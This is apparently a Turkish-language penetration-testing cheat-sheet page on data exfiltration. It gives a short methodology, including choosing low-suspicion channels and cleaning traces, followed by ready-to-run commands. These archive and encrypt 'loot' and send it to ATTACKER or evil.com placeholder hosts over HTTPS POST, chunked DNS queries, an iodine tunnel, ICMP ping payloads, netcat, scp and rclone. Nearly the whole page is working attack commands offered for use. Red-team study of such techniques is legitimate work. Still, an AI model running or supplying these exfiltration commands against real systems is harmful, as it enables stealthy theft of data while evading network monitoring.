Exfiltration
generic exfil
Loot’u dışarı çıkarmak shell kadar kritiktir. Küçük parçalar, şifreleme ve “normal görünen” protokoller (HTTPS/DNS) tercih edilir.
Metodoloji
Section titled “Metodoloji”-
Outbound hangi port/protokollerin açık olduğunu ölç.
-
Loot’u sıkıştır/şifrele; boyut ve gürültüyü planla.
-
En az şüpheli kanalı seç (HTTPS POST, DNS, ICMP).
-
Bütünlüğü doğrula (hash) ve izleri temizle (RoE’ye göre).
Hazırlık
Section titled “Hazırlık”tar czf - /path/loot | openssl enc -aes-256-cbc -salt -pbkdf2 -out loot.enc7z a -p'pass' loot.7z /path/lootsha256sum loot.encHTTP(S)
Section titled “HTTP(S)”curl -F file=@loot.enc https://ATTACKER/upcurl -T loot.enc http://ATTACKER:8000/python3 -m http.server 8000 # attackeriwr -Uri http://ATTACKER/up -Method POST -InFile loot.zipDNS / ICMP
Section titled “DNS / ICMP”# parçalı DNSxxd -p loot.enc | fold -w 60 | while read h; do dig $h.evil.com; doneiodine -f ATTACKER tunnel.evil.comping -p $(xxd -p -c 16 chunk.bin) ATTACKERAlternatif kanallar
Section titled “Alternatif kanallar”nc ATTACKER 443 < loot.encscp loot.enc user@ATTACKER:/tmp/rclone copy loot.enc remote:bucket/Checklist
Section titled “Checklist”[ ] outbound kanal doğrulandı[ ] loot şifreli/arşivli[ ] transfer tamam + hash eşleşti[ ] kanal ve dosya konumları not edildi